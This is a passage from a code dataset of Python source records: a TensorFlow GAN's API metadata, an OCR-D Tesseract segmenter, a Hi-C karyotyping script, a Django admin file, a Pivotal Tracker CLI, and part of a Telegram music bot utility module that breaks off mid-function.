"tensorflow.layers", "line_number": 169, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.relu", "line_number": 170, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 170, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.batch_normalization", "line_number": 170, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 170, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d_transpose", "line_number": 173, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 173, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.relu", "line_number": 174, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 174, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.batch_normalization", "line_number": 174, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 174, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d_transpose", "line_number": 177, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 177, "usage_type": "attribute"}, {"api_name": "tensorflow.tanh", "line_number": 180, "usage_type": "call"}, {"api_name": "tensorflow.get_collection", "line_number": 183, "usage_type": "call"}, {"api_name": 
"tensorflow.GraphKeys", "line_number": 183, "usage_type": "attribute"}, {"api_name": "tensorflow.convert_to_tensor", "line_number": 197, "usage_type": "call"}, {"api_name": "tensorflow.variable_scope", "line_number": 200, "usage_type": "call"}, {"api_name": "tensorflow.AUTO_REUSE", "line_number": 200, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d", "line_number": 202, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 202, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.batch_normalization", "line_number": 203, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 203, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d", "line_number": 206, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 206, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.batch_normalization", "line_number": 207, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 207, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d", "line_number": 210, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 210, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.batch_normalization", "line_number": 211, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 211, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d", "line_number": 214, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 214, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.batch_normalization", "line_number": 215, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 215, "usage_type": "attribute"}, {"api_name": "tensorflow.reshape", "line_number": 219, "usage_type": "call"}, {"api_name": "tensorflow.layers.dense", "line_number": 220, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 220, "usage_type": "attribute"}, {"api_name": "tensorflow.get_collection", "line_number": 223, "usage_type": "call"}, {"api_name": "tensorflow.GraphKeys", "line_number": 223, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 232, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 232, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.sparse_softmax_cross_entropy_with_logits", "line_number": 242, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 242, "usage_type": "attribute"}, {"api_name": "tensorflow.ones", "line_number": 242, "usage_type": "call"}, {"api_name": "tensorflow.int64", "line_number": 242, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_mean", "line_number": 243, "usage_type": "call"}, {"api_name": "tensorflow.nn.sparse_softmax_cross_entropy_with_logits", "line_number": 246, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 246, "usage_type": "attribute"}, {"api_name": "tensorflow.ones", "line_number": 246, "usage_type": "call"}, {"api_name": "tensorflow.int64", "line_number": 246, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_mean", "line_number": 247, "usage_type": "call"}, {"api_name": "tensorflow.nn.sparse_softmax_cross_entropy_with_logits", "line_number": 250, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 250, "usage_type": "attribute"}, {"api_name": "tensorflow.zeros", "line_number": 250, "usage_type": "call"}, {"api_name": "tensorflow.int64", "line_number": 250, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_mean", "line_number": 
251, "usage_type": "call"}, {"api_name": "tensorflow.variable_scope", "line_number": 270, "usage_type": "call"}, {"api_name": "tensorflow.AUTO_REUSE", "line_number": 270, "usage_type": "attribute"}, {"api_name": "tensorflow.train.AdamOptimizer", "line_number": 272, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 272, "usage_type": "attribute"}, {"api_name": "tensorflow.train.AdamOptimizer", "line_number": 273, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 273, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 276, "usage_type": "call"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 278, "usage_type": "call"}, {"api_name": "tensorflow.summary.FileWriter", "line_number": 279, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 279, "usage_type": "attribute"}, {"api_name": "tensorflow.train.Saver", "line_number": 280, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 280, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 282, "usage_type": "call"}, {"api_name": "numpy.random.uniform", "line_number": 311, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 311, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 311, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 332, "usage_type": "call"}, {"api_name": "tensorflow.random_uniform", "line_number": 336, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 348, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 348, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 349, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 349, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 351, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 351, "usage_type": "name"}, {"api_name": "tensorflow.variable_scope", "line_number": 359, "usage_type": "call"}, {"api_name": "tensorflow.AUTO_REUSE", "line_number": 359, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.dense", "line_number": 363, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 363, "usage_type": "attribute"}, {"api_name": "tensorflow.reshape", "line_number": 364, "usage_type": "call"}, {"api_name": "tensorflow.nn.relu", "line_number": 365, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 365, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.batch_normalization", "line_number": 365, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 365, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d_transpose", "line_number": 368, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 368, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.relu", "line_number": 369, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 369, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.batch_normalization", "line_number": 369, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 369, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d_transpose", "line_number": 372, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 372, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.relu", "line_number": 373, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 373, 
"usage_type": "attribute"}, {"api_name": "tensorflow.layers.batch_normalization", "line_number": 373, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 373, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d_transpose", "line_number": 376, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 376, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.relu", "line_number": 377, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 377, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.batch_normalization", "line_number": 377, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 377, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d_transpose", "line_number": 380, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 380, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.tanh", "line_number": 383, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 383, "usage_type": "attribute"}]} +{"seq_id": "53633250", "text": "from __future__ import absolute_import\nfrom tesserocr import PyTessBaseAPI, RIL\nfrom ocrd import Processor\nfrom ocrd_utils import getLogger, concat_padded, points_from_xywh, polygon_from_points, xywh_from_points, MIMETYPE_PAGE\nfrom ocrd_modelfactory import page_from_file\nfrom ocrd_models.ocrd_page import (\n CoordsType,\n TextLineType,\n\n to_xml\n)\n\nfrom ocrd_tesserocr.config import TESSDATA_PREFIX, OCRD_TOOL\n\nlog = getLogger('processor.TesserocrSegmentLine')\n\nclass TesserocrSegmentLine(Processor):\n\n def __init__(self, *args, **kwargs):\n kwargs['ocrd_tool'] = OCRD_TOOL['tools']['ocrd-tesserocr-segment-line']\n kwargs['version'] = OCRD_TOOL['version']\n super(TesserocrSegmentLine, self).__init__(*args, **kwargs)\n\n\n def process(self):\n \"\"\"\n Performs the line segmentation.\n \"\"\"\n with PyTessBaseAPI(path=TESSDATA_PREFIX) as tessapi:\n for (n, input_file) in enumerate(self.input_files):\n pcgts = page_from_file(self.workspace.download_file(input_file))\n image_url = pcgts.get_Page().imageFilename\n for region in pcgts.get_Page().get_TextRegion():\n log.debug(\"Detecting lines in %s with tesseract\", region.id)\n image = self.workspace.resolve_image_as_pil(image_url, polygon_from_points(region.get_Coords().points))\n tessapi.SetImage(image)\n offset = xywh_from_points(region.get_Coords().points)\n for (line_no, component) in enumerate(tessapi.GetComponentImages(RIL.TEXTLINE, True)):\n line_id = '%s_line%04d' % (region.id, line_no)\n line_xywh = component[1]\n line_xywh['x'] += offset['x']\n line_xywh['y'] += offset['y']\n line_points = points_from_xywh(line_xywh)\n region.add_TextLine(TextLineType(id=line_id, Coords=CoordsType(line_points)))\n ID = concat_padded(self.output_file_grp, n)\n self.workspace.add_file(\n ID=ID,\n file_grp=self.output_file_grp,\n mimetype=MIMETYPE_PAGE,\n local_filename='%s/%s' % (self.output_file_grp, ID),\n content=to_xml(pcgts).encode('utf-8'),\n )\n", "sub_path": "ocrd_tesserocr/segment_line.py", "file_name": "segment_line.py", "file_ext": "py", "file_size_in_byte": 2366, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "ocrd_utils.getLogger", "line_number": 15, "usage_type": "call"}, {"api_name": "ocrd.Processor", "line_number": 17, "usage_type": "name"}, {"api_name": "ocrd_tesserocr.config.OCRD_TOOL", "line_number": 20, "usage_type": "name"}, {"api_name": "ocrd_tesserocr.config.OCRD_TOOL", 
"line_number": 21, "usage_type": "name"}, {"api_name": "tesserocr.PyTessBaseAPI", "line_number": 29, "usage_type": "call"}, {"api_name": "ocrd_tesserocr.config.TESSDATA_PREFIX", "line_number": 29, "usage_type": "name"}, {"api_name": "ocrd_modelfactory.page_from_file", "line_number": 31, "usage_type": "call"}, {"api_name": "ocrd_utils.polygon_from_points", "line_number": 35, "usage_type": "call"}, {"api_name": "ocrd_utils.xywh_from_points", "line_number": 37, "usage_type": "call"}, {"api_name": "tesserocr.RIL.TEXTLINE", "line_number": 38, "usage_type": "attribute"}, {"api_name": "tesserocr.RIL", "line_number": 38, "usage_type": "name"}, {"api_name": "ocrd_utils.points_from_xywh", "line_number": 43, "usage_type": "call"}, {"api_name": "ocrd_models.ocrd_page.TextLineType", "line_number": 44, "usage_type": "call"}, {"api_name": "ocrd_models.ocrd_page.CoordsType", "line_number": 44, "usage_type": "call"}, {"api_name": "ocrd_utils.concat_padded", "line_number": 45, "usage_type": "call"}, {"api_name": "ocrd_utils.MIMETYPE_PAGE", "line_number": 49, "usage_type": "name"}, {"api_name": "ocrd_models.ocrd_page.to_xml", "line_number": 51, "usage_type": "call"}]} +{"seq_id": "269670465", "text": "\nimport argparse\nimport scipy as sp\nimport scipy.cluster\nimport sys\nimport collections\nimport triangulation\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pdb\nfrom mypy.lib import nprint\n\ndef main():\n \n parser=argparse.ArgumentParser(description='De novo karyotyping of Hi-C data.',formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument('-in',help='Hi-C interaction matrix input file',dest='infile',type=str,required=True)\n parser.add_argument('-out',help='prefix for output files',dest='outfile',type=str,required=True)\n parser.add_argument('-nchr',help='number of chromosomes/clusters. 0 will automatically estimate this number.',dest='nchr',type=int,default=0)\n parser.add_argument('-drop',help='leaves every nth bin in the data, ignoring the rest. 1 will use whole dataset.',dest='drop', type=int,default=1)\n parser.add_argument('-ci',help='list of chromosomes/contigs to include. If empty, uses all chromosomes.',dest='included_chrs',nargs='*',type=str,default=['chr1', 'chr2', 'chr3', 'chr4', 'chr5', 'chr6', 'chr7', 'chr8','chr9', 'chr10', 'chr11', 'chr12', 'chr13', 'chr14', 'chr15','chr16', 'chr17', 'chr18', 'chr19', 'chr20', 'chr21', 'chr22','chrX'])\n parser.add_argument('-s',help='seed for randomizations',dest='seed',type=int,default=0)\n parser.add_argument('-f',help='fraction of data to use for average step length calculation',dest='rand_frac',type=float,default=0.8)\n parser.add_argument('-n',help='number of iterations for average step length calculation',dest='rand_n',type=int,default=20)\n parser.add_argument('-e',help='evaluation mode. 
chromosome names are assumed to be the true chromosomal assignment.',dest='evaluate',action='store_true')\n parser.add_argument('-minnumchr',help='minimum number of chromosomes',dest='minnumchr',type=int,default=2)\n parser.add_argument('-maxnumchr',help='maximum number of chromosomes',dest='maxnumchr',type=int,default=1000)\n parser.add_argument('-p',help='number of processors to use',dest='pnum',type=int,default=1)\n parser.add_argument('-pool',help='pool interactions for all contigs which share the same name by averaging',action='store_true')\n \n args=parser.parse_args()\n \n infile=args.infile\n outfile=args.outfile\n nchr=args.nchr\n drop=args.drop\n included_chrs=args.included_chrs\n seed=args.seed\n rand_frac=args.rand_frac\n rand_n=args.rand_n\n evaluate=args.evaluate\n minnumchr=args.minnumchr\n maxnumchr=args.maxnumchr\n pnum=args.pnum\n pool=args.pool\n\n if len(included_chrs)==0:\n included_chrs=None\n\n d,bin_chr,bin_position=triangulation.load_data_txt(infile,remove_nans=True,chrs=included_chrs,retain=drop)\n\n sys.stderr.write(\"loaded \"+str(bin_chr.shape[0])+\" contigs\\n\")\n\n if pool:\n d = triangulation.func_reduce_2d(d,keys1=bin_chr,keys2=bin_chr,func=np.mean)\n bin_position = np.c_[triangulation.func_reduce_2d(bin_position,keys1=bin_chr,func=np.min)[:,0], triangulation.func_reduce_2d(bin_position,keys1=bin_chr,func=np.max)[:,1]]\n bin_chr = np.unique(bin_chr)\n \n sys.stderr.write(\"pooled to \"+str(bin_chr.shape[0])+\" contigs\\n\")\n\n transform=lambda x: np.log(np.max(x+1))-np.log(x+1)\n \n pred_nchr=False\n if nchr==0:\n ## fix for the new version of triangulation\n ## a hack rather, because I have no idea what is\n ## going on here ...\n #nchr=(minnumchr,maxnumchr)\n nchr=maxnumchr\n pred_nchr=True\n \n n=d.shape[0]\n\n sys.stderr.write(\"karyotyping...\")\n res=triangulation.predict_karyotype(d,nchr=nchr,pred_nchr=pred_nchr,transform=transform,shuffle=True,seed=seed,rand_frac=rand_frac,rand_n=rand_n)\n sys.stderr.write(\"done.\\n\")\n \n if pred_nchr:\n clust,Z,nchr,mean_step_len=res\n \n maxval=mean_step_len[-nchr+1]\n msl=len(mean_step_len)\n\n np.savetxt(outfile+'_avg_step_len.tab',np.c_[np.arange(msl+1,1,-1),mean_step_len],fmt='%s',delimiter='\\t')\n\n plt.figure(figsize=(15,5))\n plt.plot(np.arange(msl+1,1,-1),mean_step_len,marker='o',color='b')\n plt.plot(nchr,maxval,marker='o',color='r')\n plt.gca().invert_xaxis()\n plt.xlabel('number of clusters')\n \n plt.vlines(minnumchr,0,maxval,color='r')\n plt.vlines(maxnumchr,0,maxval,color='r')\n\n plt.savefig(outfile+'_avg_step_len.png',dpi=600,format='png')\n \n plt.xlim(min(msl,nchr+30),max(0,nchr-30))\n plt.ylim(0,maxval*1.1)\n plt.savefig(outfile+'_avg_step_len_zoomed.png',dpi=600,format='png')\n \n sys.stderr.write(\"identified \"+str(nchr)+\" chromosomes.\\n\")\n \n\n\n else:\n clust,Z = res\n\n \n np.savetxt(outfile+'_clusteringZ.tab',Z,fmt='%s',delimiter='\\t')\n \n with open(outfile+'_clusters.tab','w') as fh:\n nprint([bin_chr,bin_position.astype('int'),clust.astype('int')],fh=fh)\n\n \n\n if evaluate:\n\n # match each cluster to the chromosome which most of its members belongs to\n \n chr_order=dict( zip(included_chrs,range(len(included_chrs))) )\n \n new_clust=np.zeros(n,dtype=bin_chr.dtype)\n new_clust_num=np.nan*np.ones(n)\n\n for i in range(nchr):\n\n new_clust[clust==i]=collections.Counter(bin_chr[clust==i]).most_common(1)[0][0]\n new_clust_num[clust==i]=chr_order[collections.Counter(bin_chr[clust==i]).most_common(1)[0][0]]\n\n sys.stderr.write(\"accuracy: 
\"+str(np.sum(new_clust==bin_chr)/float(n))+\"\\n\")\n\n plt.figure(figsize=(15,5))\n\n triangulation.chr_color_plot(np.mean(bin_position,1),bin_chr,new_clust_num,included_chrs) \n\n plt.savefig(outfile+'_evaluation.png',dpi=600,format='png')\n \n with open(outfile+'_evaluation.tab','w') as fh:\n nprint([bin_chr,bin_position.astype('int'),new_clust.astype('int')],fh=fh)\n\n \n\nif __name__==\"__main__\":\n main()\n\n \n", "sub_path": "scripts/karyotype.py", "file_name": "karyotype.py", "file_ext": "py", "file_size_in_byte": 5947, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 15, "usage_type": "call"}, {"api_name": "argparse.ArgumentDefaultsHelpFormatter", "line_number": 15, "usage_type": "attribute"}, {"api_name": "triangulation.load_data_txt", "line_number": 50, "usage_type": "call"}, {"api_name": "sys.stderr.write", "line_number": 52, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 52, "usage_type": "attribute"}, {"api_name": "triangulation.func_reduce_2d", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 55, "usage_type": "attribute"}, {"api_name": "numpy.c_", "line_number": 56, "usage_type": "attribute"}, {"api_name": "triangulation.func_reduce_2d", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 56, "usage_type": "attribute"}, {"api_name": "numpy.max", "line_number": 56, "usage_type": "attribute"}, {"api_name": "numpy.unique", "line_number": 57, "usage_type": "call"}, {"api_name": "sys.stderr.write", "line_number": 59, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 59, "usage_type": "attribute"}, {"api_name": "numpy.log", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 61, "usage_type": "call"}, {"api_name": "sys.stderr.write", "line_number": 74, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 74, "usage_type": "attribute"}, {"api_name": "triangulation.predict_karyotype", "line_number": 75, "usage_type": "call"}, {"api_name": "sys.stderr.write", "line_number": 76, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 76, "usage_type": "attribute"}, {"api_name": "numpy.savetxt", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.c_", "line_number": 84, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 90, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.vlines", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 92, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.vlines", 
"line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 93, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 95, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 95, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 97, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 97, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "sys.stderr.write", "line_number": 101, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 101, "usage_type": "attribute"}, {"api_name": "numpy.savetxt", "line_number": 109, "usage_type": "call"}, {"api_name": "mypy.lib.nprint", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 123, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 123, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 127, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 128, "usage_type": "call"}, {"api_name": "sys.stderr.write", "line_number": 130, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 130, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 130, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 132, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 132, "usage_type": "name"}, {"api_name": "triangulation.chr_color_plot", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 134, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 136, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 136, "usage_type": "name"}, {"api_name": "mypy.lib.nprint", "line_number": 139, "usage_type": "call"}]} +{"seq_id": "532402228", "text": "from django.contrib import admin\nfrom Ercesscorp.models import RegistrationData ,BlogData\n# Register your models here.\n\nclass BlogAdmin(admin.ModelAdmin):\n list_display = ('title','author')\n list_filter = ('title','author')\n fieldsets = (\n\n ('Blog Information', {\n 'classes': ('collapse',),\n 'fields': ('title','author','image', 'description','date')\n }),\n\n\n )\n\nadmin.site.register(RegistrationData)\nadmin.site.register(BlogData , BlogAdmin)", "sub_path": "Ercesscorp/admin.py", "file_name": "admin.py", "file_ext": "py", "file_size_in_byte": 490, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.contrib.admin.ModelAdmin", "line_number": 5, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 5, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 18, "usage_type": "call"}, {"api_name": "Ercesscorp.models.RegistrationData", "line_number": 18, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 18, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 18, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 19, "usage_type": "call"}, {"api_name": 
"Ercesscorp.models.BlogData", "line_number": 19, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 19, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 19, "usage_type": "name"}]} +{"seq_id": "206193408", "text": "import sys\nimport shlex\nimport argparse\nfrom pypivotal import PivotalIntegration, Helpers\n\n\ndef import_stories(token, project_id):\n pivotal = PivotalIntegration(token)\n tools = Helpers()\n\n stories = pivotal.get_stories(\n project_id, tools.story_states['finished'], tools.two_days_before()\n )\n for story in stories:\n url = story['url']\n created = tools.datetime_string_converter(story['created_at'])\n print(f'Ticket URL: {url}')\n print(f'Creation date: {created}')\n\n\ndef get_projects(token):\n pivotal = PivotalIntegration(token)\n for project in pivotal.projects:\n print(f'Name: {project[\"name\"]} - ID: {project[\"id\"]}')\n\n\ndef main(argv):\n parser = argparse.ArgumentParser()\n parser.add_argument(\n 'token',\n help='Your token to Pivotal Tracker -> https://www.pivotaltracker.com/profile#api'\n )\n start_args = parser.parse_args(argv)\n\n while True:\n print('Enter one of command: projects, stories')\n\n command, *args = shlex.split(input('> '))\n\n if command == 'exit':\n break\n\n elif command == 'help':\n print('Enter exit')\n\n elif command == 'projects':\n get_projects(start_args.token)\n\n elif command == 'stories':\n import_stories(start_args.token, args[0])\n\n else:\n print('Unknown command: {}'.format(command))\n\n\nif __name__ == '__main__':\n main(sys.argv[1:])\n", "sub_path": "action_performer.py", "file_name": "action_performer.py", "file_ext": "py", "file_size_in_byte": 1452, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pypivotal.PivotalIntegration", "line_number": 8, "usage_type": "call"}, {"api_name": "pypivotal.Helpers", "line_number": 9, "usage_type": "call"}, {"api_name": "pypivotal.PivotalIntegration", "line_number": 22, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 28, "usage_type": "call"}, {"api_name": "shlex.split", "line_number": 38, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 57, "usage_type": "attribute"}]} +{"seq_id": "399566986", "text": "import asyncio\nimport glob\nimport random\nimport string\nimport shutil\nimport traceback\nfrom asyncio import sleep, TimeoutError\nfrom collections import namedtuple\nfrom datetime import date\nfrom functools import wraps\nfrom time import time\nfrom hashlib import sha256\nfrom contextlib import suppress\n\nimport aiofiles\nimport aiohttp\nfrom mutagen.flac import FLAC, Picture\nfrom aiogram import exceptions, types\nfrom eyed3.id3 import Tag\nfrom yarl import URL\n\nfrom var import var\nimport config\n\n\ndef sign(args):\n sign_str = ':'.join(str(arg) for arg in args) + config.request_sign\n sha256(sign_str.encode('ascii'))\n\n\ndef check_sign(data: dict):\n input_sign = data.pop('sign', None)\n return sign(data.values(), config.request_sign) == input_sign\n\n\ndef print_traceback(exc):\n print(''.join(traceback.format_tb(exc.__traceback__)))\n\n\nasync def query_answer(query, *args, **kwargs):\n try:\n await query.answer(*args, **kwargs)\n except exceptions.InvalidQueryID as exc:\n print(exc)\n\n\ndef new_callback(*args, sep=\":\"):\n return sep.join(str(arg) for arg in args)\n\n\ndef parse_callback(callback, sep=\":\"):\n return callback.split(sep)\n\n\ndef random_string(length=10):\n return 
\"\".join(random.sample(string.ascii_letters, length))\n\n\ndef clear_link(message):\n for entity in message.entities:\n if entity.type == \"url\":\n return (\n entity.url or\n message.text[entity.offset: entity.offset + entity.length]\n )\n\n\ndef split_string(text, divider=\"\\n\"):\n result = []\n words = text.split(divider)\n string = \"\"\n for i, word in enumerate(words):\n if len(string + word) > 4096:\n result.append(string)\n string = \"\"\n string += word + divider\n if i == len(words) - 1:\n result.append(string)\n string = \"\"\n return result\n\n\ndef already_downloading(track_id):\n status = var.downloading.get(track_id) # pylint: disable=no-member\n if status is None or int(time()) - status > 60:\n return False\n return True\n\n\ndef donated_user(user_id):\n return user_id in config.admins or user_id in config.donated_users\n\n\ndef islink(text):\n return \"https://\" in text or \"http://\" in text\n\n\nStats = namedtuple(\"Stats\", (\"downloaded_tracks\",\n \"sent_tracks\", \"received_messages\"))\n\n\ndef get_today_stats():\n datestr = date.today().isoformat()\n downloaded_tracks = 0\n sent_tracks = 0\n received_messages = 0\n for filename in glob.iglob(f\"logs/{datestr}/*file_downloads.log\"):\n downloaded_tracks += sum(1 for line in open(filename))\n for filename in glob.iglob(f\"logs/{datestr}/*sent_messages.log\"):\n sent_tracks += sum(1 for line in open(filename))\n for filename in glob.iglob(f\"logs/{datestr}/*messages.log\"):\n received_messages += sum(1 for line in open(filename))\n return Stats(downloaded_tracks, sent_tracks, received_messages)\n\n\ndef encode_url(url, *args, **kwargs):\n data = {}\n for arg in args:\n if isinstance(arg, dict):\n data.update(arg)\n data.update(kwargs)\n url = URL(url).with_query(data)\n return str(url)\n\n\ndef calling_queue(size):\n def wrapper(coro):\n sem = asyncio.Semaphore(size)\n\n @wraps(coro)\n async def decorator(*args, **kwargs):\n async with sem:\n try:\n result = await asyncio.wait_for(coro(*args, **kwargs), 100)\n except TimeoutError as exc:\n print_traceback(exc)\n else:\n return result\n\n return decorator\n\n return wrapper\n\n\nasync def download_file(url, path):\n r = await request_get(url)\n async with aiofiles.open(path, \"wb\") as f:\n async for chunk in r.content.iter_chunked(2048):\n await f.write(chunk)\n return path\n\n\nasync def get_file(url):\n r = await request_get(url)\n return await r.content.read()\n\n\nasync def get_album_cover_url(album_id, res='1000x1000'):\n r = await request_get(f\"https://api.deezer.com/album/{album_id}/image\")\n return str(r.url).replace(\"120x120\", res)\n\n\ndef add_tags(path, track, album, image, lyrics):\n try:\n genre = 